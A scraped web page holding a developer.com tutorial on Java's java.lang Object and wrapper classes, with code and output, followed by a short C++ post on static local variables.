The hash code is deemed as a distinct integer that uniquely identifies an object. That means if two objects have the same hash code, they actually are an alias or the same object. A hash code is internally implemented by converting the internal address of the object into an integer.
Employee e1=new Employee(); Employee e2=e1; e1==e2; // true e1.equals(e2); // true
The Object class contains a variation of the wait() method that is used to pause the currently running thread until some other thread invokes the notify() or notifyAll() method for this object.
The protected finalize() method of the class may be overridden to dispose of system resources or to perform other cleanup operations. However, Java does not guarantee that, on invocation of this method, the garbage collector will be promptly put into action nor is it recommended to explicitly use this method.
There is another protected method in the Object class, called clone(). It is mainly overridden to create a copy of the invoked object.
Wrapper Classes
The java.lang library provides wrapper classes for primitive data types such as int, char, float, and so forth. Primitive data types types of Java are not part of any the object hierarchy; they are mainly there for performance reasons. There are certain disadvantages of primitive types in Java, such as while passing a primitive data type as a method argument, they are passed by value. There is no way to pass them by reference directly. As a result, it is not possible to share the same instance of a primitive type value across multiple methods. The wrapper class helps in creating an object representation of these primitive data types, somewhat like wrapping the primitive type within a class. This is the reason these classes are called wrapper classes.
The hierarchy of the wrapper classes are implemented as follows.
Figure 1: The wrapper classes hierarchy
The Number is an abstract class, is the base class of all wrapper classes that represent numeric types. It contains abstract methods such as byteValue(), doubleValue(), floatValue(), intValue(), longValue(), and shortValue(), which return the object value according to the different number format such as byte, double, float, int, long, and short respectively.
Wrappers for Floating-point Type Numeric Values
The Double and Float classes are wrappers for floating-point types. Apart from providing numerous convenient methods, these classes provide constants, such as shown in the following instances:
For Double:
public class Main { public static void main(String[] args) { System.out.println("Maximum Exponent :" + Double.MAX_EXPONENT); System.out.println("Minimum Exponent :" + Double.MIN_EXPONENT); System.out.println("Maximum positive value :" + Double.MAX_VALUE); System.out.println("Minimum positive value :" + Double.MIN_VALUE); System.out.println("Width in bytes :" + Double.BYTES); System.out.println("Negative Infinity :" + Double.NEGATIVE_INFINITY); System.out.println("Positive Infinity :" + Double.POSITIVE_INFINITY); System.out.println("bit width of wrapped value :" + Double.SIZE); } }
Output:
Maximum Exponent :1023 Minimum Exponent :-1022 Maximum positive value :1.7976931348623157E308 Minimum positive value :4.9E-324 Width in bytes :8 Negative Infinity :-Infinity Positive Infinity :Infinity bit width of wrapped value :64
Similarly, constant values can be obtained for the Float wrapper class. For details on various methods of these classes, refer to the Java API documentation.
Apart from many convenient methods of the Float and Double class, they have two methods, called isInfinite() and isNaN(). These two methods are implemented based on the IEEE floating-point specification of infinity and NaN (Not a Number). The method isInfinity() returns a boolean true value if the value on which it is tested is infinitely large or minutely small in magnitude. And, the method isNaN() returns the true value if the value on which it is tested is not a number.
public class Main { public static void main(String[] args) { System.out.println(new Double(1/0.).isInfinite()); System.out.println(new Double(0/0.).isNaN()); } }
Output:
true true Wrappers for Integer type numeric value
Integer, Long, Short, and Byte are wrappers for integer types. Apart from providing numerous convenient methods, these classes provide constants such as follows:
public class Main { public static void main(String[] args) { System.out.println("Maximum value :" + Integer.MAX_VALUE); System.out.println("Minimum value :" + Integer.MIN_VALUE); System.out.println("Width in bytes :" + Integer.BYTES); System.out.println("bit width of wrapped value :" + Integer.SIZE); } }
Output:
Maximum value :2147483647 Minimum value :-2147483648 Width in bytes :4 bit width of wrapped value :32
Similarly, constant values can be obtained for Byte, Short, and Long. For details on various methods of these classes, refer to the Java API documentation.
A quick example of the utility of Integer wrapper class is as follows.
public class Main { public static void main(String[] args) { System.out.println(Integer.toBinaryString(20)); System.out.println(Integer.toHexString(20)); System.out.println(Integer.toOctalString(20)); } }
Output:
10100 14 24
Wrapper for the char Type
The Character wrapper class wraps around the primitive data type char. It provides several static methods to categorize characters and alter their cases, such as isDigit(), isWhiteSpace(), toLowerCase(), and so on.
One of the intriguing aspects of this class is the support for Unicode characters. Prior to JDK version 5, Unicode characters are held to a 16-bit char size. With the expansion of Unicode characters, the default size of the char became insufficient to hold a character value ranging from 0 to 10FFFF. As a result, the technique of dealing with Unicode characters underwent interesting changes.
To understand how Java deals with Unicode, we must understand three basic terms: The Basic Multilingual Plane (BMP) includes characters between 0 to FFFF. Unicode characters that are beyond 0 to FFFF are called supplemental characters. The code point is a character in the range of 0 to 10FFFF.
Java uses two char types to represent a supplemental character. The first, char, is called a high surrogate and the last one called a low surrogate. A new method, codePointAt(), is provided to translate between code points and supplemental characters. Also, Java overloaded several pre-existing methods that take an integer argument, such as;
static boolean isLetter(int codePoint) static boolean isDigit(int codePoint) static boolean isDefined(int codePoint)
The overload form takes int rather than char as an argument because an int type as a single value is large enough to hold two chars.
A Quick Example
public class Main { public static void main(String[] args) { System.out.println(Character.toLowerCase('A')); System.out.println(Character.isDigit('7')); System.out.println(Character.isLetter('5')); for (int i = 0x03B1; i < 0x03D1; i++) System.out.println(Character.getName(i) + "=" + (char) i); } }
Output:
a true false GREEK SMALL LETTER ALPHA=α GREEK SMALL LETTER BETA=β GREEK SMALL LETTER GAMMA=γ ...
Wrapper for Boolean Type
The class Boolean is a wrapper for boolean primitive types. This class provide methods for converting boolean values to a string and vice versa, along with many useful constants. The main use of this class is when we when we want to pass by reference a boolean data type as a method argument.
Conclusion
The java.lang library has many other important classes and interfaces; also, there are many sub packages. But, when one talks about this package, these two categories of classes must be the first point of discussion. Much like the Object class, the package java.lang is also never explicitly imported, unless of course we are using entities defined in many of its sub packages. One should have a very clear idea about what this package offers because it houses many of the basic classes and interfaces... | https://www.developer.com/java/data/exploring-the-java.lang-library.html | CC-MAIN-2019-43 | en | refinedweb |
Posted on December 31, 2015Author daryl C++: Static variable This entry is part 61 of 61 in the series C++A static variable takes its first initiated value and remains unchanged. #include "stdafx.h" #include <iostream> using namespace std; void main() { for (int i = 2; i<5; ++i) { static int a = i; cout << a << endl; } system("pause"); } Series Navigation<< C++: Friend Class | https://codecrawl.com/2015/12/31/c-static-variable/ | CC-MAIN-2019-43 | en | refinedweb |
Dialog refresh works correct in R18... not in R21 ?
- marcelobruno last edited by m_magalhaes
Situation:
LogoButton.SetImage... (image of gui changes)
More code....
LogoButton.SetImage again. (image of gui changes)
End of code.
Problem in R21:
In R18 the image changes, then the rest of code keeps runing.
In R21 nothing is updated until the end of the code.
So in R18 this works correctly, but in R21 the bitmap of the button in the dialog Never changes until all the operations ends.
The only way I found to see the gui update in R21 is:
(of course just as test to help me detect the problem):Calling the command to show the About screen of C4D or opening a Modal dialog so the bitmap changes, then when the modal dialog is closed the operation goes on.... I tried this that already works in R18:
c4d.EventAdd()
c4d.EventAdd(c4d.EVENT_FORCEREDRAW)
c4d.DrawViews(c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW | c4d.DRAWFLAGS_NO_THREAD | c4d.DRAWFLAGS_NO_REDUCTION | c4d.DRAWFLAGS_STATICBREAK)
All this doesn't seems to force the update of dialog on R21, it will only update the image on the end of the operations or until a modal dialog or about screen of c4d appears... issue, there's too much dark spot.
You are setting image of a imageButton but we need to know on witch function you are doing it.
c4d.EventAdd() push a update event in the stack and DrawViews refresh cinema4D view (with also updating the scene)
It's probably too much updates, just because you change the image of a button.
So, are you doing that on your Command function ? CreateLayout ? Message ?
Can you share a bit of your code ?
Cheers,
Manuel.
Hi!
Thank you for answering!
Here a gif showing the problem, left side R18, right side R21
Main difference:
It seems R21 is not even updating the console for each print, it just updates when script ends
1 - self.btnImage.SetImage(self.image2, True) #Change image first
2 - self.testCode() # Sample test code just prints lot of stuff in console...
3 - self.btnImage.SetImage(self.image1, True) #Change image again
- m_magalhaes last edited by m_magalhaes
hi,
Thanks for taking the time of doing that Gif, but i think i already understood what was your issue. Now we need to find the cause.
I've asked you questions to be able to point you to the right direction or investigate the issue.
Are you doing that on your Command function ? CreateLayout ? Message ?
As it seems to just be a dialogbox with a button, maybe you can share your code and we can directly test it.
With what you gave us, we can simply "guess" what you are doing.
Cheers,
Manuel
Here a link:
Download Code Here
Maybe is the same problem/solution:
Is there a way to make the console behaves like in R18 that updates each time a print is done and it doesn't wait the full script to end to show the prints? for example a a simple for loop that prints stuff
Thank you
Your link has expired. You can post the code directly in a posting, just use the little brackets icon.
Cheers
zipit
- marcelobruno last edited by marcelobruno
I ziped because it contains 2 images in the folder 'res' of the plugin location:
*I think that just finding a way to update the interface like when the console prints each print in a While loop like it behaves in R18 it can be the same solution for this problem
Link:
import c4d, os from c4d import gui, documents from c4d import utils from c4d import plugins PLUGIN_ID=1029596 #Welcome to the world of Python class MiDialogo(c4d.gui.GeDialog): dir, file = os.path.split(__file__) # Gets the plugin's directory images_Path = os.path.join(dir, 'res') # Adds the res folder to the path image1 = os.path.join(images_Path, 'image1.jpg') image2 = os.path.join(images_Path, 'image2.jpg') def CreateLayout(self): bc = c4d.BaseContainer() # Create a new container to store the button image bc.SetBool(c4d.BITMAPBUTTON_BUTTON, True) self.AddStaticText(241798101, c4d.BFH_CENTER, 0, 0, name='Change bitmap first, run more code, then change again') self.btnImage = self.AddCustomGui(241798100, c4d.CUSTOMGUI_BITMAPBUTTON, "Bitmap Button", c4d.BFH_CENTER, 60, 70, bc) self.AddButton(241798102, c4d.BFH_CENTER, initw=150, inith=20, name="Test") self.btnImage.SetImage(self.image1, True) return True def testCode(self): i = 1 while i < 6000: print(i) c4d.EventAdd() i += 1 def Command(self, id, msg): if id == 241798102: #Change bitmap first, then run code, then change bitmap again self.btnImage.SetImage(self.image2, True) #Change image first self.testCode() # Sample test code #gui.MessageDialog('Here a code instead of a popup', c4d.GEMB_OK) self.btnImage.SetImage(self.image1, True) #Change image again return True class MyMenuPlugin(c4d.plugins.CommandData): dialog = None def Execute(self, doc): # create the dialog if self.dialog is None: self.dialog = MiDialogo() return self.dialog.Open(dlgtype=c4d.DLG_TYPE_ASYNC, pluginid=PLUGIN_ID, defaultw=200, defaulth=150, xpos=-1, ypos=-1) def RestoreLayout(self, sec_ref): # manage the dialog if self.dialog is None: self.dialog = MiDialogo() return self.dialog.Restore(pluginid=PLUGIN_ID, secret=sec_ref) if __name__=='__main__': okyn = plugins.RegisterCommandPlugin(PLUGIN_ID, "Change bitmap test",0,None, "Change bitmap test", MyMenuPlugin()) if (okyn): print "Change bitmap test"
No solution? mm No way to force update of the dialog/console during the script as R18 behaves? to see each print at the right moment instead of waiting untild end of script or a modal dialog to appear to update dialog/console?
hello,
i can confirm the issue here even in c++.
There are two issue here.
The python console have been changed a lot. Printing out things in the console is really slow. (in general)
With the last versions, you can print out lots of data and it doesn't block your code. That's why your loop execute really faster in R20/21 than on previous version.
There's no "flag" to make the console act as before.
The BitmapButton not updating is a lot more important and look like a bug.
This is under investigation and I'll be back to confirm if it's a bug. (both issue)
Cheers
Manuel.
@m_magalhaes Thank you a lot!
hello,
I don't think the console will be changed and with the R21, the redraw have been modified a bit.
Your code block the execution of the command and should not. This could be done differently but would lead to a bit more work.
The easiest way to "force" the update of the dialog box is to ask for the mouse state. This will force the os to ask for a redraw and c4d will redraw the box.
Just add :
self.SetString(1003, "Before") self.btnImage.SetImage(self.image2, True) #Change image first bc = c4d.BaseContainer() c4d.gui.GetInputState(c4d.BFM_INPUT_MOUSE, c4d.BFM_INPUT_CHANNEL, bc)
Cheers,
Manuel
@m_magalhaes Epic, It works! :) Thank you very much Manuel! | https://plugincafe.maxon.net/topic/11808/dialog-refresh-works-correct-in-r18-not-in-r21/7 | CC-MAIN-2019-43 | en | refinedweb |
How would I initialize Allegro bitmaps(287 to be exact) in a for loop? The images are in a folder called, "images" and the file name have the syntax,image-0.jpg image-1.jpg image-2.jpg ... Here is what I have of code, have not tested.
//not all codeint num;
ALLEGRO_BITMAP *image[287] = NULL;for (num = 0; num <= 287; num++) image[num] = al_load_bitmap("images/image-"".jpg"); // code needs the number of image ...
for (num = 0; num < = 287; num++) al_destroy_bitmap(image[num]);
You can use a stringstream to get that:
#include <sstream>
std::stringstream s;
s << "image-" << i;
image[i] = al_load_bitmap(s.str().c about C++, but in regular do have to check if the image loaded, but he wanted to know how to get those file-names correct.
he wanted to know how to get those file-names correct.
My bad.
I use this for my pacman game to load in my main character. He is on a sprite sheet which is basically just a group of images, all 50x50 each, 4 wide x 5 high.
pacman.sheet = al_load_bitmap("Graphics/Pacman.png");
if(!pacman.sheet) {
a5_error(AT, display.screen, "Failed to load Pacman bitmaps.");
shut_down();
exit(1);
}
for(int y = 0; y < 5; y++) { // bitmaps are 5 rows
for(int x = 0; x < 4; x++) { // by 4 columns
pacman.bitmap[4*y+x] = al_create_sub_bitmap(pacman.sheet, x*SPRITE_SIZE, y*SPRITE_SIZE,
SPRITE_SIZE, SPRITE_SIZE);
}
}
I have a function called shut_down(); that will destroy any bitmaps that were created. I don't like just exiting my program on error without first calling that to properly destroy anything that may have been created before the error.
Anyhow, this way you load in the graphics all at once, then you can procede to create subbitmaps of each image you want if they're all related (and small enough to fit on a single sheet).
Arthur: how will <code>image[num] = al_load_bitmap("images/image-"".jpg");</code> know what image number to load?!I see you corrected that.
I have always done it like: (C code, I actually use C99 myself)
Also, when I save images like that, I like to name them with 3 numbers, like IMAGE000.JPG, IMAGE001.JPG ... IMAGE287.JPG, they will list in your directory in order this way... in which case you want to use something like:
sprintf(filename, "images/image%03d.jpg", i);
--Deluxe Pacman 1 downloadDeluxe Pacman 2 downloadDonations
Wow, a quick replay!!! Thanks, and I got the program going so now program was successful in allocating bitmaps with a for loop to get all 287 bitmaps with correct file names. Since you guys help me I am willing to share you on my project and source code(still needs work though). I am creating a program which flashes images so fast it bypasses the conscious mind and goes to the subconscious mind. I'm using this with books I want to read mostly programming books in pdf converted with imageMagick to jpg. I've decided to call the program al_photoreader. In theory I will be able to bring back this information back to the conscious mind by remembering my dreams. Hopefully somebody is interested.
this is the simplest code i have used for loading 8 audio samples in my program.
ALLEGRO_SAMPLE *sample[8];
ALLEGRO_SAMPLE_INSTANCE *sample_instance[8];
char path[30] = "data\\samples\\sample (0).wav";
for (int i = 0; i < 8; i++)
{
// i replace the char 22 of the path, result: sample(i).wav
path[21] = '0'+(i + 1); // the '0' is just for implicit conversion
cout << path << endl;
sample[i] = al_load_sample(path);
sample_instance[i] = al_create_sample_instance(sample[i]);
al_set_sample_instance_gain(sample_instance[i], samples_volume);
al_set_sample_instance_playmode(sample_instance[i], ALLEGRO_PLAYMODE_ONCE);
al_attach_sample_instance_to_mixer(sample_instance[i], al_get_default_mixer());
} | https://www.allegro.cc/forums/thread/610983 | CC-MAIN-2017-47 | en | refinedweb |
Actions¶
Define your view¶
You can setup your actions on records on the show or list views. This is a powerful feature, you can easily add custom functionality to your db records, like mass delete, sending emails with record information, special mass update etc.
Just use the @action decorator on your own functions. Here’s an example
from flask_appbuilder.actions import action from flask_appbuilder import ModeView from flask_appbuilder.models.sqla.interface import SQLAInterface class GroupModelView(ModelView): datamodel = SQLAInterface(Group) related_views = [ContactModelView] @action("myaction","Do something on this record","Do you really want to?","fa-rocket") def myaction(self, item): """ do something with the item record """ return redirect(self.get_redirect())
This will create the necessary permissions for the item, so that you can include or remove them from a particular role.
You can easily implement a massive delete option on list’s. Just add the following code to your view. This example will tell F.A.B. to implement the action just for list views and not show the option on the show view. You can do this by disabling the single or multiple parameters on the @action decorator.
@action("muldelete", "Delete", "Delete all Really?", "fa-rocket", single=False) def muldelete(self, items): self.datamodel.delete_all(items) self.update_redirect() return redirect(self.get_redirect())
F.A.B will call your function with a list of record items if called from a list view. Or a single item if called from a show view. By default an action will be implemented on list views and show views so your method’s should be prepared to handle a list of records or a single record:
@action("muldelete", "Delete", "Delete all Really?", "fa-rocket") def muldelete(self, items): if isinstance(items, list): self.datamodel.delete_all(items) self.update_redirect() else: self.datamodel.delete(items) return redirect(self.get_redirect()) | http://flask-appbuilder.readthedocs.io/en/latest/actions.html | CC-MAIN-2017-47 | en | refinedweb |
I was looking for way to solve this small Boolean pointer references problem but cannot came to a solution. I know C++ becomes complex when it comes to usage of Pointers and references.
Below code fragments uses a flow like references of
bool*
true
#include <iostream>
int main()
{
bool* temp= nullptr;
bool* temp2;
bool* temp3;
temp2 = temp;
temp3=temp2;
bool temp5 = true;
*temp3 = temp5;
std::cout << *temp <<std::endl;
return 0;
}
You are assigning value to a
nullptr. That is what is causing segmentation fault
Just replace line
bool* temp = nullptr;
with this
bool* temp= new bool;
It will work now.
And don't forger to delete it with
delete operator. | https://codedump.io/share/BZaHX8KjYLwX/1/correct-way-to-reference-boolean-pointers-each-other-in-c | CC-MAIN-2017-47 | en | refinedweb |
On 2015-05-01 3:23 PM, Yury Selivanov wrote: > Let. > To further clarify on the example: class SomeIterable: def __iter__(self): return self async def __aiter__(self): return self async def __next__(self): print('hello') raise StopAsyncIteration If you pass this to 'async for' you will get 'hello' printed and the loop will be over. If you pass this to 'for', you will get an infinite loop, because '__next__' will return a coroutine object (that has to be also awaited, but it wouldn't, because it's a plain 'for' statement). This is something that we shouldn't let happen. Yury | https://mail.python.org/pipermail/python-dev/2015-May/139764.html | CC-MAIN-2017-47 | en | refinedweb |
- Preventing XSS in ASP.NET
Thursday, August 07, 2014 by martijn broed, SQL Injection and Cross Site Request Forgery, in ASP.NET apps before. This article looks at preventing Cross Site Scripting, a third common type of vulnerability in websites.
While a modern framework does much to make these attacks more difficult, I believe we should first have an understanding of the ways an app is vulnerable to an attack. First, let's look at what Cross Site Scripting is and how it can be exploited.
What Is Cross Site Scripting.
A Persisted XSS Attack.
A Reflected XSS Attack.
DOM Based Attacks.
Protecting From Cross Site Scripting Attacks.
Validate All Input.
If we know a value should always be an integer, then you can validate the input using code such as:
int memberId; if (!int.TryParse(externalValue, out memberId)) { return RedirectToAction("InputError"); }
If the framework cannot parse the previously retrieved
externalValueas an integer, the code redirects to a page that would display an error. Otherwise we know that
memberIdcontains an integer value. This process also works with other basic types. Some more common types also provide methods to validate the information. The .NET
Uriclass contains a method
IsWellFormedUriStringthat can validate a URL. This would allow validation that a user's homepage entry contains a valid URL before display.
var userHomePage = userRecord["homepage"]; if (!Uri.IsWellFormedUriString(newUrl, UriKind.Absolute)) { Model.homepage = "none"; } else { Model.homepage = Html.Encode(userHomePage); }
Other and more complex data types need more complex validation. Validation of a credit card number field could remove any characters in the string that are not digits. Validation of more complex strings could need regular expressions. Validation of a class may need more complex checks as well.
ASP.NET Request Validation
ASP.NET provides effective protection against reflected attacks using request validation. If ASP.NET detects markup or code in a request, it throws a "potentially dangerous value was detected" exception and stops the processing of the request.
validateRequest="false"to the
Pagedirective in Webforms would turn the validation off for a page. In ASP.NET MVC, adding the
[ValidateInput(false)]attribute to a controller action turns off validation for that action, while adding the
[AllowHtml]attribute turns off validation for a field.
ASP.NET 4.0 changed request validation in several ways. This and later versions of the framework do validation early in the HTTP request. The validation also applies to all ASP.NET requests and not just
.aspxpage requests. This includes custom HTTP modules too. Pages that rely on the original behavior can revert to the older method by setting the
requestValidationModeattribute in the
web.configfile to version
2.0.
<httpRuntime requestValidationMode="2.0" />
Even better, is to disable this only for pages where needed, using the syntax in the
web.configfile:
<location path="novalidationpage.aspx"> <system.web> <httpRuntime requestValidationMode="2.0" /> </system.web> </location>
ASP.NET 4.5 added the ability to defer validation until requesting the data. Setting the
requestValidationModeattribute in your
web.configfile to version
4.5activates this new behavior.
<httpRuntime requestValidationMode="4.5" />
ASP.NET 4.5 also added the
HttpRequest.Unvalidatedproperty. Using this property allows easier access to the unvalidated form value where needed. By combining delayed validation and the
Unvalidatedproperty, you can access the unvalidated values when needed, but protect other form inputs.
Encoding HTML. The resulting page shows the message to the user with a field, such as:
<%= Html.Label("Message", Model.message) %>
... and displays as:
If we change the URL call to
http:/appname/placeorder/<script>alert('hello!');</script>, we now get something different.
The script could be anything of course and not just the harmless alert box that appears here. Request Validation would catch the above examples and return an exception before display. If turned off though, then encoding the output prevents the attack.
ASP.NET makes it easy to encode data in order to prevent attacks. Early versions of MVC using Webform's syntax often contained code such as this which did not encode HTML.
<p id="status"><%= status ></p>
You had to manually encode the output so that any HTML would be converted into a display format. So the
<character becomes the string
<. The
Html.Encodefunction provides this conversion. The safer form of code thus becomes:
<p id="status"><%= Html.Encode(status) ></p>
ASP.NET MVC later introduced a syntax for doing this in one step by replacing
<=with
<:so the code can be shortened to:
<p id="status"><%: status ></p>
Using the Razor view engine, all output is HTML encoded unless you specifically use a method to not encode it. In Razor, the code equivalent to the above becomes:
<p id="status">@status</p>
Razor automatically handles HTML encoding of whatever the string
statuscontains. In a case where you need to render the raw data, you can use the
HTML.Raw()method. To display the result without encoding, we can use:
<p id="status">@Html.Raw(status)</p>
In this example, the above code would make our application vulnerable again..
AntiXSS Library
If you're writing an ASP.NET application, you should use the AntiXSS Library for ASP.NET. From the project's website, "AntiXSS provides a myriad of encoding functions for user input, including HTML, HTML attributes, XML, CSS and JavaScript."
HtmlEncodemethods use the black listing approach that only encode certain, potentially dangerous characters.
Microsoft began including core routines from this library into ASP.NET 4.5 in a new
System.Web.Security.AntiXssnamespace. You can also setup the framework to use these AntiXSS methods in place of the built-in encoding routines. You do this by setting the
encoderTypeattribute of
httpRuntimein the
web.configfile for the application:
<httpRuntime ....
In Summary
Preventing cross site scripting is harder than it initially seems. OWASP lists over 80 vectors that can be targeted using cross site scripting attacks. That organization also lists these vulnerabilities as third in their 2013 list of top ten web vulnerabilities.
If you do not ensure that all outside data brought into your application is properly escaped or do not validate input before placing it on an output page, you leave your web application vulnerable to cross site scripting. In ASP.NET, this can be done by:
- Validating all external input to your application before displaying on a webpage.
- Use Request Validation everywhere that your application doesn't specifically need to turn it off, such as a form allowing rich HTML input. If you must allow unvalidated information, leave validation on everywhere else in your application.
- Encode HTML before displaying external data on a webpage
- Use the AntiXSS based methods included in ASP.NET 4.5 and use the AntiXSS library for older versions of ASP.NET.
Leave a comment › Posted in: Daily | http://www.4elements.com/blog/comments/preventing_xss_in_asp.net | CC-MAIN-2017-47 | en | refinedweb |
remlok
This is a very small and simple web framework, which still aims to tackle complicated problems.
Think re-frame talking to the server out of the box.
Prerequisites
If haven’t already, you really want to readre-frame tutorial.
If you have used re-frame, you will get a grasp of this one in no time.
Understanding of how reagent components and reactions work is required.
Also, note that remlok is a no-magic framework. It keeps things simple and not surprising, but this also means that you shouldn’t be afraid to get your hands dirty, since it doesn’t do much by default.
In a nutshell
This is what happens when you use remlok:
db -> read -> :loc -> render -> user action -> mut! -> :loc -> db* | | v v :rem :rem | | ------------> send <------------------- | v remote | v merge! | v db*
It’s your typical eternal cycle of data, flowing , but with a twist – it has a branch which leads to the remote.
As you can see, remlok allows you to have your say on every step of the application lifecycle. It also tries to be as predictable and reasonable as possible with its default actions.
Locrem
Read and mutation functions return locrems.
A locrem is a map
{:loc local-result :rem send-this-to-remote}
Both
:loc and
:rem are optional.
Query
A query is a pair
[topic args]
Both for reads and mutations.
It is considered appropriate to omit the
args , e. g.
[:cur-user] ,
[:log-out] etc.
Read
You set up your read functions with
pub like this
(pub :cur-user (fn [db _] ;; this is the read function {:loc (reaction (get @db :cur-user))}))
remlok will use the query’s topic to decide on the read function.
Read function will receive two arguments,
db and
query .
db – the application state ratom.
query – the query to read.
Read function must return thislocrem
{:loc reaction :rem query}
Render
Just use reagent components.
(defn users [] (let [users (read [:users {:first 10}])] (fn [] [:ul (for [{:keys [id name]} @users] ^{:key id} [:li name])])))
Mutation
You set up your mutation functions with
mut like this
(mut :logout (fn [db _] ;; this is the mutation function {:loc (dissoc db :cur-user) :rem [:log-out]}))
remlok will use the query’s topic to decide on the mutation function.
Mutation function will receive two arguments,
db and
query .
db – the application state.
query – the query to read.
Mutation function must return thislocrem
{:loc db* :rem query}
Send
You set up your send function with
send like this
(send (fn [req res] ;; this is the send function (my-network/send (my-edn/serialize req) (comp res my-edn/deserialize))))
Send function will receive
req and
res arguments.
req – the request.
res – the callback to call with theresponse, once it’s available from the remote.
The request has the format
{:reads [query0 query1 ...] :muts [query0 query1 ...]}
Note that remlok will be smart enough to batch the queries.
Novelty
The novelty must have the format
[[query0 data0] [query1 data1] ...]
Merge
You set up your merge function with
merge like this
(merge :new-score (fn [db _ score] ;; this is the merge function (update db :score + score)))
remlok will use the query’s topic to decide on the merge function.
Merge function will receive three arguments,
db ,
query and
data .
db – the application state.
query – the query, the result of which you’re merging.
data – the result itself.
Merge function must return the new application state.
How does merging work?
The function which merges a novelty is called
merge! . remlok will call it for you, when your send function calls its
res callback.
As we already know, the novelty should have the format
[[query0 data0] [query1 data1] ...]
As you can see, those are just
[query data] pairs, where the
data is the result of the corresponding
query .
For example, if you have a request
{:reads [[:user 1] [:user 2]] :muts [[:user/new {:id "tmp_id_1" :name "Alice"}]]}
you may receive
[[[:user 1] {:id 1 :name "Bob"}] [[:user 2] {:id 2 :name "Shmob"}] [[:user/new {:id "tmp_id_1" :name "Alice"}] {:id 3}]]
By setting up merge handlers for the topics, you can control how all those things are getting integrated into your application state.
For example, you may want to patch your temporary ids like this (super naive but demonstrates the point):
(merge :user/new (fn [db [_ {tmp-id :id}] {id :id}] (let [user (get-in db [:users tmp-id])] (-> db (update :users dissoc tmp-id) (assoc-in [:users id] user)))))
Note that you can call
merge! by yourself at any time with any properly formatted novelty. This will be usable if you want to handle push updates from the remote (i. e. when there’s no send before the merge).
Remote
remlok.rem namespace exposes
pub ,
mut ,
read and
mut! functions, along with the fallbacks
pubf and
mutf .
read and
mut! allow you to pass the
ctx , any clojure value, which will be passed to your handler functions.
remlok has no further opinions on how you handle things on your server.
Something like this:
(pub :users (fn [db-conn [_ {:keys [name]}]] (my-sql-lib/select db-conn "select * from users where name = :name" {:name name}))) (def db-conn (my-sql-lib/open-connection)) (defn endpoint [req] (let [{:keys [reads]} (my-edn/deserialize req) res (for [query reads] [query (read db-conn query)])] (my-edn/serialize res))) (my-network/listen! 80 endpoint)
Fallbacks
remlok provides fallbacks for everything, so it can function on its own, without you specifying a single handler. (Obviously, the send fallback doesn’t actually do anything except emitting a warning that it doesn’t do anything.)
Fallbacks have f at the end –
pubf ,
mutf ,
sendf and
mergef , and are public. Their docstrings explain what they do (they don’t do a whole lot).
Read, mutation and merge fallbacks are initially registered for
:remlok/default topic. When remlok can’t find the handler for a topic, it just uses whatever handles
:remlok/default . Note that the handler is given the initial query (and, therefore, the initial topic).
Of course, you can set up your own fallback (the "default" handler):
(pub :remlok/default (fn [db query] (println "Warning! Unknown query " (str query)) nil ;; nil is explicit to emphasize that we are returning an empty locrem ))
Note that even if you set up your own default handler, you still can use default fallbacks:
(pub :search-input pubf ;; simple enough for pubf to handle )
Examples
They feature optimistic updates and all that!
Why remlok?
Because you will learn it in dozens of minutes, and it will let you do things that are still often deemed non-trivial.
(Of course, I’m supposing that you already can read and write Clojure and know what reagent is all about.)
Why not declarative queries like in om.next?
Well, first of all, your queries is just data, so they are declarative; they are just not nested out of the box.
It was a very deliberate decision to keep the queries flat, since the API and all the machinery was getting seriously complicated, and remlok was on the verge of stopping being "miniature".
So, much like in re-frame, you can not nest queries, but I strongly believe that not all applications actually need recursive/deeply nested queries.
(Actually, feel free to check recursive-queries branch, which is trying to have om.next-like queries.)
(Also, you can emulate recursive queries to some extent , having all that "friend of friend of friend" madness in your
args .)
Why request has :reads and :muts, but response (and novelty in general) does not?
The request sent to your remote has
:reads and
:muts to let your remote know how to process each query.
Since queries have exactly the same format for reads and mutations, this will let you know when to use
read and
mut! on the remote.
On the other hand, the response is just a vector of pairs
[query data] .
That’s because, from the client’s point of view, all that comes from the remote is reads. For example, if the client sends a mutation
[:user/new "Alice"] , the response
[[:user/new "Alice"] {:id 1}] is not a "mutation", it’s a read of the result of that mutation. Basically, the client sends reads and mutations, and says, "I want the response to be the reads of the results of all those operations I sent".
Why global state?
Just like re-frame, remlok uses global state, so you can have only one application per client context (and only one application per server context, for that matter).
Of course, this solution isn’t quite optimal, so any feedback is welcome!
Why should I handle requests by hand on the remote?
Since you may be composing your response in a non-trivial fashion.
One of the examples, "Wiki Autocompleter", features such a case (it uses core.async to wait for the reads to be completed).
License
Distributed under the Eclipse Public License, the same as Clojure.
评论 抢沙发 | http://www.shellsec.com/news/20755.html | CC-MAIN-2017-47 | en | refinedweb |
Jsp code:
<r:tabPanel switchType="client" binding="#{binding.tabPanel1}"...
@Name("binding") @Scope(ScopeType.CONVERSATION) public class Binding implements Serializable { private HtmlTabPanel tabPanel1 = new HtmlTabPanel(); @Logger Log log; private HtmlTabPanel tabPanel1 = new HtmlTabPanel(); public HtmlTabPanel getTabPanel1() { log.debug("GET TAB PANEL1" + tabPanel1); return tabPanel1; } public void setTabPanel1(HtmlTabPanel tabPanel1) { log.debug("SET TAB PANEL1" + tabPanel1); this.tabPanel1 = tabPanel1; } }
javax.el.PropertyNotFoundException: Target Unreachable, identifier 'binding' resolved to null...
Looks like Seam conversation scope is stored somewhere in the view state, and therefore is initialized only after component tree. So binding to conversation scoped-bean most likely causes failure.
I would recommend to use request or session scoped bean.
That is not RichFaces issue but Seam's. I may be wrong, so ask in Seam forum to know for sure.
I just had a similar problem, I solved it by outjecting the binding object.
There is actually an aptly named chapter in the seam docs for this, which I completely missed ;)
The seam forum post is here: | https://developer.jboss.org/message/34611?tstart=0 | CC-MAIN-2017-47 | en | refinedweb |
I have been working on creating a simple ftplib upload script that can send a file to a server. Everything works fine but now I want to know if its possible to use a html form to allow a user to chose the file to be uploaded. This would mean defining the file from the form in the script. I am unsure of how to go about this?
Here is my ftp upload script:
import ftplib filename = 'test.doc' ftp = ftplib.FTP('ftp.*******.com') ftp =('****','*****')('uploads') myfile = open('/Users/Joey/Downloads/test.doc', 'rb')('STOR ' + filename, myfile)
I have been using the Python shell to execute this script, will I need to make changes if I wanted this script to be executed when the user submits the form?
I am using wamp as a local server to host my simple html form on a webpage. I am assuming you need a variable to record the file chosen from the form, instead of my script just having the test file already written?
Thanks for any help in advance | http://www.dreamincode.net/forums/topic/341055-uploading-file-to-a-server-via-ftplib-from-a-html-form/page__pid__1976247__st__0 | CC-MAIN-2016-07 | en | refinedweb |
